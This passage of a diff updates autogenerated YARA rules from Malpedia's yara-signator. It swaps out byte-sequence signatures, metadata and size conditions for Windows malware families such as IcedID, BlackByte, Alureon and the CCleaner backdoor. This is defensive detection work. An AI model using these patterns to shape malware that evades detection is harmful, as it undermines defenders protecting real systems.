-		$sequence_2 = { 83fbff 0f8420070000 6a00 53 e8???????? 8945f8 }
-		$sequence_3 = { 50 e8???????? 6a00 6a00 2df1000000 50 8b06 }
-		$sequence_4 = { 6a00 56 6a00 6802000001 6a00 53 }
-		$sequence_5 = { 85c0 7c04 85d2 7d02 33c9 8bc1 c3 }
-		$sequence_6 = { 50 e8???????? b001 e8???????? 68???????? 68???????? e8???????? }
-		$sequence_7 = { c6041000 bf01000000 8db36cfeffff 8b06 85c0 7438 }
-		$sequence_8 = { bb???????? 8b45f8 50 8d8577ffffff 50 }
-		$sequence_9 = { 7435 e9???????? 56 8d85effdffff }
+		$sequence_0 = { 8a4701 47 84c0 75f8 8b0d???????? 8d84240c010000 }
+		$sequence_1 = { 6a00 8908 668b0d???????? 6a00 895004 68000000c0 }
+		$sequence_2 = { 42 3acb 75f6 8dbd00080000 8db5000c0000 e8???????? }
+		$sequence_3 = { e8???????? 8b54241c 68???????? 8bf0 52 8d44241c 50 }
+		$sequence_4 = { 33c0 8da42400000000 8a1485d0604100 889405000e0000 40 83f80b }
+		$sequence_5 = { 8d842480000000 50 ff15???????? 8b3d???????? }
+		$sequence_6 = { 8d0cbd20804100 8901 8305????????20 8b11 81c200080000 }
+		$sequence_7 = { 85c0 0f8581000000 80bc24ae01000001 7533 8b0d???????? 8b15???????? }
+		$sequence_8 = { 84c0 75f6 8d85c0140000 48 }
+		$sequence_9 = { 75f9 8b1424 6a00 2bc1 8d4c242c }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Wastedloader_Auto : FILE
+rule MALPEDIA_Win_Icedid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9b391e1-a439-5c84-8bc6-d01e7837fa3f"
+		id = "7cb01d8c-6ddc-5faf-a2d7-b352678038d8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wastedloader_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icedid_auto.yar#L1-L300"
 		license_url = "N/A"
-		logic_hash = "f52a5046711dc64fff342d42959b67fac6d384f1f957f74196d547273f13eb4f"
+		logic_hash = "80a642e8024f176494bc232a2f8ca8c27a08e0dff1dc2e9038b4b5cccdea7c2e"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99711,32 +99772,54 @@ rule MALPEDIA_Win_Wastedloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7444 eb00 686bb90000 ff15???????? }
-		$sequence_1 = { 7ed7 7488 09b31ced6185 1ce2 }
-		$sequence_2 = { e8???????? 3d1e050000 c10147 833b38 }
-		$sequence_3 = { a828 b409 1c04 e8???????? }
-		$sequence_4 = { 7aec e471 e8???????? 0057bb 038919fc885d e479 }
-		$sequence_5 = { b9b5000000 8b55f8 66894a4c 8b45f8 }
-		$sequence_6 = { 8b45f8 66895056 b9b8000000 8b55f8 66894a58 8b45f8 0fb74858 }
-		$sequence_7 = { 0200 00e7 aa 53 }
-		$sequence_8 = { 2cbe 832061 5b 5b }
-		$sequence_9 = { 8b55f8 0fb7421e 83e854 8b4df8 6689411e ba86000000 }
+		$sequence_0 = { ff15???????? 85c0 7511 56 57 ff15???????? }
+		$sequence_1 = { 7411 40 50 6a08 ff15???????? }
+		$sequence_2 = { 50 ff15???????? 8bf7 8bc6 }
+		$sequence_3 = { 7413 ff36 6a08 ff15???????? }
+		$sequence_4 = { 85f6 742c 803e00 7427 6a3b 56 ff15???????? }
+		$sequence_5 = { 85ff 7418 c60700 47 57 ff15???????? }
+		$sequence_6 = { 68???????? 6a00 ff15???????? 33c0 40 }
+		$sequence_7 = { 6a3b 56 ff15???????? 8bf8 85ff 7418 }
+		$sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
+		$sequence_9 = { 5f 743f 8d5808 0fb713 }
+		$sequence_10 = { 03c2 eb5c 8d5004 89542414 8b12 85d2 7454 }
+		$sequence_11 = { 0132 47 83c302 3bfd 72c4 8b542414 }
+		$sequence_12 = { 85d2 7454 8d6af8 d1ed }
+		$sequence_13 = { 8d5808 0fb713 8954241c 66c16c241c0c }
+		$sequence_14 = { 8d4508 50 0fb6440b34 50 ff740b28 }
+		$sequence_15 = { 2345fc 8be5 5d c3 55 8bec ff7518 }
+		$sequence_16 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
+		$sequence_17 = { 8a4173 a808 75f5 a804 }
+		$sequence_18 = { ff5010 85c0 7407 33c0 e9???????? }
+		$sequence_19 = { 89442408 0fb70424 8b4c2408 03c8 }
+		$sequence_20 = { 48 8b523c e8???????? 48 89433c 48 85c0 }
+		$sequence_21 = { 48 8945b8 48 85c0 0f84db000000 8b4324 48 }
+		$sequence_22 = { 4c 8b15???????? 48 8d442450 44 }
+		$sequence_23 = { 49 8943d8 ff15???????? 85c0 }
+		$sequence_24 = { 4c8bc3 33d2 488bc8 ff15???????? 488bb590020000 }
+		$sequence_25 = { 3b7b1c 72d7 8b430c 4803c6 0f845affffff 488bcd }
+		$sequence_26 = { 488d5702 488bce ff15???????? ba22000000 488bce ff15???????? 4885c0 }
+		$sequence_27 = { 4289448440 488b5c2428 4c3b5c2430 7307 4c8b742420 }
+		$sequence_28 = { 488bd8 4885c0 0f84cb000000 488bb590020000 41ba01000000 }
+		$sequence_29 = { 488bb590020000 488b7c2438 33c9 33d2 }
+		$sequence_30 = { 80bb8000000040 0f8577ffffff 488d8b81000000 488d542450 e8???????? 85c0 }
+		$sequence_31 = { 75b9 4883c314 e9???????? ff15???????? 33c0 }
 
 	condition:
-		7 of them and filesize < 2677760
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Mim221_Auto : FILE
+rule MALPEDIA_Win_Mozart_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "228071fb-1a03-5df1-9306-75e661d4eff3"
+		id = "e6ef70f1-9d8c-5900-bac0-94145c939b8a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mim221_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mozart_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "fbcd019f6c67a46486f2c63b4d67a0947f9feb6ff08f1d935eac4f65f1ebad93"
+		logic_hash = "3d072f882d8d032cd0ba33880719776c6c63b0d1fb641e5640a7afb53ae04bf9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99750,32 +99833,32 @@ rule MALPEDIA_Win_Mim221_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0d77ec0100 e8???????? 488bf0 483bc5 7507 33c0 e9???????? }
-		$sequence_1 = { 66c785cc0000007800 66c785ce0000006300 66c785d00000006500 66c785d20000007000 66c785d40000007400 66c785d60000006900 66c785d80000006f00 }
-		$sequence_2 = { 48894108 488b442440 488b4808 4885c9 740f ff15???????? 488b4c2440 }
-		$sequence_3 = { 33d2 488d42ff 48f7f1 4883f801 733b 48c78424b800000000000000 488d9424b8000000 }
-		$sequence_4 = { 49c743a80f000000 49c743a000000000 c644247800 33c0 488d48ff 488d7c2460 f2ae }
-		$sequence_5 = { e8???????? 90 488d4c2450 e8???????? 90 488d054c2b0100 4889442450 }
-		$sequence_6 = { c78424c0000000d8000000 89ac24c4000000 89b424c8000000 48c78424d000000020010000 89bc24d8000000 48c78424e000000018000000 44899c24e8000000 }
-		$sequence_7 = { 4883f8ff 488be8 0f84ae000000 488d9424c0000000 488bc8 c78424c000000038020000 e8???????? }
-		$sequence_8 = { 6644897c2450 66c74424526400 66c74424545d00 66897c2456 }
-		$sequence_9 = { 7505 498bd1 eb21 498b5108 41386849 7504 49895008 }
+		$sequence_0 = { 33f6 c644241800 eb26 8d4c2418 51 }
+		$sequence_1 = { 8b542468 41 3bca 736e 8bd0 }
+		$sequence_2 = { 7c19 3c39 7f15 bd01000000 eb08 3c30 7c36 }
+		$sequence_3 = { 7471 c1e006 0bc7 a900000001 7425 }
+		$sequence_4 = { 0f84a0010000 48 0f84e6000000 48 0f85fd010000 85ed 7544 }
+		$sequence_5 = { 0fbe0a 8a89c8924000 0fb6f9 8bcf 42 83e940 }
+		$sequence_6 = { 8a08 40 84c9 75f9 8b8c2420100000 }
+		$sequence_7 = { 90 8a82e0ba4000 3a841420010000 751f b8???????? }
+		$sequence_8 = { 83fe10 7409 33f6 c644241800 eb39 80fb3d 740e }
+		$sequence_9 = { 3bd0 72e2 5e 32c0 }
 
 	condition:
-		7 of them and filesize < 471040
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Silon_Auto : FILE
+rule MALPEDIA_Win_Krdownloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77f22f8e-9f0a-5d81-b5cb-4a1b2cbd5d10"
+		id = "8928305b-67d0-5595-b543-162ed3d8a500"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.silon_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.krdownloader_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "7b66629e0b9d8daa583e325d7e0da1ae5ba2cceda52e365df066a9ac5301a777"
+		logic_hash = "b190fd97a74e2ef74cfd54dab7101c2dd88a9538032e0c3b3bee219ca7927a46"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99789,32 +99872,32 @@ rule MALPEDIA_Win_Silon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8b956cfeffff 52 e8???????? 83c40c 837d8400 }
-		$sequence_1 = { 898858080000 eb7c 8b55fc 8b8254080000 898514efffff }
-		$sequence_2 = { 83c404 8945a4 837da400 746e 8b55a8 }
-		$sequence_3 = { 0f868f000000 833d????????00 0f8482000000 c745e400000000 }
-		$sequence_4 = { 50 6a00 e8???????? 83c410 89856cfeffff 83bd6cfeffff00 }
-		$sequence_5 = { 8d8de8f9ffff 51 68???????? 8d95e8fbffff }
-		$sequence_6 = { 8b55fc 8b8254080000 8b4dfc 03815c080000 }
-		$sequence_7 = { 83c410 6a65 a1???????? 50 }
-		$sequence_8 = { 8b85c4feffff 8945d4 0fb74dcd 85c9 7e34 0fb755cd }
-		$sequence_9 = { 681d5b931f 6a05 e8???????? 8945fc 8b4510 50 }
+		$sequence_0 = { eb26 8b4dfc 034df4 0fb6512c 52 68???????? 8b45f0 }
+		$sequence_1 = { 83ec34 894df8 c745fc00000000 8b450c }
+		$sequence_2 = { c745ec00000000 c745f400000000 c745d810000000 c745e000000000 c745d000000000 c745f800000000 c745e800000000 }
+		$sequence_3 = { 83c40c 8b45f8 50 ff15???????? eb26 }
+		$sequence_4 = { c745fc00000000 6a00 6822020000 ff15???????? }
+		$sequence_5 = { 6a00 6840004004 8d45f4 50 68???????? 68???????? }
+		$sequence_6 = { 83c40c c745f400000000 8d85f4f7ffff 50 8b4dfc 81c1640d0300 }
+		$sequence_7 = { ffd1 8b55fc 83ba540d030000 7415 8b45fc 8b88540d0300 51 }
+		$sequence_8 = { c740040f000000 8b4dfc 51 8b55f8 52 8d85e4ebffff }
+		$sequence_9 = { 50 8d85f0fbffff 50 8b4df8 51 e8???????? }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Pwnpos_Auto : FILE
+rule MALPEDIA_Win_Blackbyte_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f880853-80ef-5ec2-a31a-31cd2006dc43"
+		id = "3f4218e0-59a8-5f1a-8491-b9f27553e507"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pwnpos_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackbyte_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "145bb3fa97da57220c104891d855f912aebbcf21962d1405b1589dc2cce60605"
+		logic_hash = "0158273c319395ac538b84dc759203c353b02e7e79481c3f34491558ae9bcead"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99828,32 +99911,38 @@ rule MALPEDIA_Win_Pwnpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? bb0b000000 52 899c2468020000 e8???????? 83c40c }
-		$sequence_1 = { 8b07 8b4004 3974380c 750f 8b44383c 3bc6 7407 }
-		$sequence_2 = { 8bf0 33db 83c404 3bf3 742d 8d4e18 c7460401000000 }
-		$sequence_3 = { 8d4df0 e8???????? 8b4d0c 895dfc 8b5f30 51 c745ec01000000 }
-		$sequence_4 = { 51 53 56 52 50 8d4c243c 51 }
-		$sequence_5 = { 8b4d08 83c118 e9???????? 8b4d08 83c118 e9???????? }
-		$sequence_6 = { 720f 8b95a0f9ffff 52 e8???????? 83c404 b001 8b4df4 }
-		$sequence_7 = { 57 57 57 57 57 8d85d8f9ffff 50 }
-		$sequence_8 = { c705????????80b24300 c3 c705????????80b24300 c3 }
-		$sequence_9 = { 0f871c020000 ff248dc86f4300 8d48cf 80f908 7706 }
+		$sequence_0 = { 498d7101 0f1f440000 4839c6 7ce0 4889c6 41b806000000 }
+		$sequence_1 = { 3bc1 7505 e8???????? 4883c304 }
+		$sequence_2 = { 3bc2 72f4 b8ffffffff 4883c420 }
+		$sequence_3 = { 3bc7 7ce0 eb03 488bda }
+		$sequence_4 = { 3bc1 7f4d 33c9 4c63c8 }
+		$sequence_5 = { 4983f851 7553 4c8d4002 4c39c1 }
+		$sequence_6 = { 4989c3 4889cf 488b4c2428 48897c2450 4c895c2468 4b8d0413 90 }
+		$sequence_7 = { 4983f803 0f8f66010000 90 4983f801 0f8fb6000000 }
+		$sequence_8 = { 3bc2 7f2f 4c63d8 85c0 }
+		$sequence_9 = { 0f1005???????? 4c8960e0 4533e4 4c8968d8 }
+		$sequence_10 = { 4983f805 0f8511020000 4c8d4304 4c39c6 }
+		$sequence_11 = { 493b6610 0f8626010000 4883ec70 48896c2468 488d6c2468 }
+		$sequence_12 = { 3bc1 7573 488d4c2448 664585c0 }
+		$sequence_13 = { 3bc1 7558 498bcb 6685d2 }
+		$sequence_14 = { 4989c3 488b8424b0000000 e8???????? 488b4c2468 }
+		$sequence_15 = { 493b6610 767b 4883ec38 48896c2430 488d6c2430 4889442440 49c7c500000000 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 9435136
 }
-rule MALPEDIA_Win_Stinger_Auto : FILE
+rule MALPEDIA_Win_Atmii_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d5345cc-6891-5cd1-840e-a83631b5fe99"
+		id = "4bbbbf02-dbb5-50f9-89bd-68bafb7f61b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stinger_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmii_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "89238eb5fdfe99680f7f49528afc66652f68e02cb4c9414363e841a63c1fb66a"
+		logic_hash = "de7adb20577b33d8a8506758d2e0ffbda74b46bc9a6446d600c84a3c6b3b34c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99867,32 +99956,38 @@ rule MALPEDIA_Win_Stinger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 8b5dfc 53 83c324 53 8b1b }
-		$sequence_1 = { 85db 7409 53 e8???????? 83c404 ff75f0 ff75f4 }
-		$sequence_2 = { 83f90a 1bd2 83d100 c1e008 8d4cd137 0bc1 }
-		$sequence_3 = { 8b5dfc 83c320 895df8 8b5df8 }
-		$sequence_4 = { 83f800 0f84e6030000 ff75fc 8b5d08 ff33 b902000000 e8???????? }
-		$sequence_5 = { ff35???????? ff35???????? b903000000 e8???????? 83c40c 8945c4 6805000080 }
-		$sequence_6 = { 51 53 890b 50 3bc8 0f8f56030000 }
-		$sequence_7 = { 8b5dfc 83c314 895df8 8965f4 6800000000 ff15???????? 90 }
-		$sequence_8 = { 8a143a 8a0c30 32ca 5a 880c10 }
-		$sequence_9 = { 8b5df8 8b7df4 85db 8b75fc 7436 0fb606 8bc8 }
+		$sequence_0 = { f6c302 740a 83481804 8a0a 884810 }
+		$sequence_1 = { eb60 68???????? eb55 68???????? 8d55ac 52 }
+		$sequence_2 = { 56 c745f800000000 ff15???????? 85c0 0f94c0 8845ff }
+		$sequence_3 = { 8d95dcfbffff 52 e8???????? 83c418 6a00 }
+		$sequence_4 = { 50 ffd3 8a5510 8985cdf9ffff 8b450c 50 }
+		$sequence_5 = { 750a 8b4dfc 8b5109 ffd2 eb02 33c0 }
+		$sequence_6 = { 8b55fc 0355f4 8a02 8801 ebdd 8be5 }
+		$sequence_7 = { 8d95fcf3ffff 52 e8???????? 83c42c }
+		$sequence_8 = { 8d45b8 50 68???????? 68b6000000 8d8df8fcffff 68???????? 51 }
+		$sequence_9 = { 6a00 6a02 ff15???????? 8bf8 897dfc 83ffff 0f8456010000 }
+		$sequence_10 = { 8985c5f9ffff ffd7 50 ffd3 }
+		$sequence_11 = { 0f8419040000 53 57 6814020000 }
+		$sequence_12 = { 83c414 68???????? 50 68???????? 68???????? ffd7 8b4e10 }
+		$sequence_13 = { 8d45cc 50 eb14 68???????? 8d4dcc }
+		$sequence_14 = { 6a00 ff15???????? 50 ff15???????? 68???????? 68d5000000 }
+		$sequence_15 = { 8a8dfcfeffff 8a95fefeffff 8a8500ffffff 57 }
 
 	condition:
-		7 of them and filesize < 197096
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Kaolin_Rat_Auto : FILE
+rule MALPEDIA_Win_Alureon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9e8556c-d2a8-55c8-b1a4-294ebe1251e5"
+		id = "117dd26b-ed24-54a6-81be-757a69affa6d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kaolin_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kaolin_rat_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alureon_auto.yar#L1-L175"
 		license_url = "N/A"
-		logic_hash = "f64c57e6849676b495ac58f80cd5164da6e94327fa0e0172abebd0301649988c"
+		logic_hash = "9eb93e11f255dfd7233db5216742e55bd1642de34cc4ea7abe163cf90bc56063"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99906,34 +100001,40 @@ rule MALPEDIA_Win_Kaolin_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 44897c2428 44897c2420 4533c9 4533c0 488bd0 33c9 }
-		$sequence_1 = { 66c704083f00 eb1d 48c744242001000000 4c8d0df8af0200 ba01000000 498bcc e8???????? }
-		$sequence_2 = { 488bd7 488d4d08 e8???????? 488b4d18 488b5520 488bc2 482bc1 }
-		$sequence_3 = { 488b8a30000000 e9???????? 488b8a60000000 e9???????? 4055 4883ec20 488bea }
-		$sequence_4 = { 48833d????????10 480f4305???????? 448828 418bdd 48391d???????? }
-		$sequence_5 = { 4c8d0dab4c0200 ba03000000 488bcf e8???????? }
-		$sequence_6 = { 4885c0 750a b9c8000000 e9???????? 4c8b6008 488b00 83b88c00000000 }
-		$sequence_7 = { ba04010000 488d8db0000000 e8???????? 418bcf 48890d???????? 488d3d5eae0300 488d1517b00300 }
-		$sequence_8 = { 4883fa10 480f431d???????? 4803d9 4d8bc6 498bd5 488bcb e8???????? }
-		$sequence_9 = { 482bc1 4883f801 721d 488d4101 488945d0 488d45c0 4883fa10 }
+		$sequence_0 = { 895d14 7439 49 d1e9 41 894df8 8b4d14 }
+		$sequence_1 = { 6a60 59 32c0 8d7c2420 }
+		$sequence_2 = { 45 33d2 0fb74158 d1e8 44 }
+		$sequence_3 = { 49 8d541d2c 45 8be3 49 8bfb }
+		$sequence_4 = { 8bc3 c1e808 88442440 8954242c }
+		$sequence_5 = { 68000010c0 8d45fc 50 c745d818000000 895ddc c745e440000000 895de8 }
+		$sequence_6 = { 49 8bfb 44 2b6330 8b0a 48 }
+		$sequence_7 = { 668b85a0fbffff 8b4df4 8b3d???????? 66894108 }
+		$sequence_8 = { 5f 8d442454 89442428 8d442420 50 }
+		$sequence_9 = { 75f9 ff75b4 8d4dbc 2bc6 8b35???????? 51 }
+		$sequence_10 = { 50 68???????? a4 ff15???????? 8bc3 8d7001 8a08 }
+		$sequence_11 = { ff742428 ff15???????? 8bf8 83ffff 7507 33c0 eb43 }
+		$sequence_12 = { beff000000 33db 56 8d85f9fcffff 53 50 }
+		$sequence_13 = { 8d9c2400050000 e8???????? 8bc3 50 33db 53 53 }
+		$sequence_14 = { 8bf8 83c418 85ff 7504 32c0 }
+		$sequence_15 = { e8???????? be00030000 83c418 8975ec c745f000010000 895df8 56 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Campoloader_Auto : FILE
+rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "47bbab4d-d2fa-57b5-b699-26c8446d214c"
+		id = "afe83831-af08-566c-bd71-ab10e23239e8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.campoloader_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ccleaner_backdoor_auto.yar#L1-L275"
 		license_url = "N/A"
-		logic_hash = "66a1664e5b6aaa82c7d5c893eda78f4cfabab07bd0de557bd9bf7b0222c59b17"
+		logic_hash = "be44c857d399380efa2dec8cf50305b24c9727966e69281b9da9b0167cac9243"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99945,32 +100046,53 @@ rule MALPEDIA_Win_Campoloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2b4dd8 894dd4 8b55f8 0355d4 8955f8 8b45f8 }
-		$sequence_1 = { 7407 33c0 e9???????? c78548efffff00000000 8d8de8fcffff 898d7cefffff }
-		$sequence_2 = { 898568efffff 8d95f0feffff 52 ff15???????? 898550efffff 0fb78554efffff 50 }
-		$sequence_3 = { 8bec b8bc100000 e8???????? a1???????? 33c5 8945fc a1???????? }
-		$sequence_4 = { 8b55f8 0355d4 8955f8 8b45f8 }
-		$sequence_5 = { 8a11 8855e4 8345d001 807de400 75ee 8b45d0 2b45a4 }
-		$sequence_6 = { e8???????? 83c404 89856cefffff 8b958cefffff 2b956cefffff 89958cefffff c78564efffff00000000 }
-		$sequence_7 = { ff15???????? 898550efffff 0fb78554efffff 50 ff15???????? 66898522f1ffff b902000000 }
-		$sequence_8 = { 8b45e4 8945ec 8b4dec 83c101 894dd8 }
-		$sequence_9 = { c745f8ffffffff 8b45e8 50 8b4d08 51 ff15???????? 83c408 }
+		$sequence_0 = { ffd6 50 ff15???????? 8b3d???????? 59 ffd7 }
+		$sequence_1 = { 8a11 305103 8b480c 8b09 8a5101 }
+		$sequence_2 = { 03c6 85c0 7f09 488b0a 488b01 ff5008 488b4b28 }
+		$sequence_3 = { 01442424 eb30 8b4508 897518 }
+		$sequence_4 = { 8d856cffffff 6a0c 50 c7856cffffff11618a64 c78570ffffff470de38d c78574ffffff27defaf2 e8???????? }
+		$sequence_5 = { 013e 33c0 8b16 83c410 }
+		$sequence_6 = { 03c6 4863d0 4c8d0c12 4c8d4718 }
+		$sequence_7 = { 33f6 6a1c 8d45e4 59 c60000 }
+		$sequence_8 = { 01cc cc 48895c2408 57 }
+		$sequence_9 = { 03c0 894340 8b7340 418bc4 }
+		$sequence_10 = { 83c410 8d85fcfeffff 50 ff15???????? be00010000 }
+		$sequence_11 = { 8b450c 53 56 8b7508 8b5510 03c6 }
+		$sequence_12 = { 03cd 41 8a01 4c 03cd 8802 }
+		$sequence_13 = { 6844494e00 e8???????? 8365e400 8945e0 8d4508 6a04 }
+		$sequence_14 = { 83e805 743a 48 7409 }
+		$sequence_15 = { 7507 33c0 e9???????? e8???????? 6800000100 6a40 }
+		$sequence_16 = { 01442454 03d1 294c2450 8b4c2410 }
+		$sequence_17 = { 01460c 488b3f 493bfc 0f8554ffffff }
+		$sequence_18 = { 01461c 8b542424 85d2 7405 }
+		$sequence_19 = { 0fb645f8 50 8d45d8 50 }
+		$sequence_20 = { 012e 33c0 5f 5e }
+		$sequence_21 = { 00cc cc 4057 4883ec50 }
+		$sequence_22 = { 03c7 4863c8 488d1c4b 493bdc }
+		$sequence_23 = { 42 47 8a07 8802 8a4701 42 8802 }
+		$sequence_24 = { 014c2464 40 89542418 89442430 }
+		$sequence_25 = { ff15???????? 46 83fe3c 7cd0 }
+		$sequence_26 = { 50 56 e8???????? 8b45f8 bfa0010000 c1e008 }
+		$sequence_27 = { 01442418 03c8 8954242c 8b542470 }
+		$sequence_28 = { 00cc cc 4883ec28 488b11 }
+		$sequence_29 = { 8bd1 49 8bd0 41 }
+		$sequence_30 = { 013d???????? 8b04b5d8970210 0500080000 3bc8 }
 
 	condition:
-		7 of them and filesize < 66560
+		7 of them and filesize < 377856
 }
-rule MALPEDIA_Win_Chrgetpdsi_Stealer_Auto : FILE
+rule MALPEDIA_Win_Mirage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d3ecdf63-3d7b-56f8-8ebb-39b6f5471caa"
+		id = "c8a9a712-bc3f-5690-a472-64df6910b6ba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chrgetpdsi_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chrgetpdsi_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mirage_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "6bfcd142e96c03742e4fbcd1d45c8791f0f2de988eb9c6e51f8b962532c287a2"
+		logic_hash = "4e4af3295967c47493f17386d2e75f998cb14d5de0104dd5de1d503e94b2b46e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99984,32 +100106,38 @@ rule MALPEDIA_Win_Chrgetpdsi_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488dbc2428010000 488d742408 660f1f840000000000 0f1f4000 48896c24f0 488d6c24f0 e8???????? }
-		$sequence_1 = { e8???????? 84c0 0f8489010000 488b4c2458 488d7101 488b7c2478 0f1f440000 }
-		$sequence_2 = { 48898c24b0000000 4889442468 48895c2460 488d3dd9b32500 be27000000 e8???????? 488b542468 }
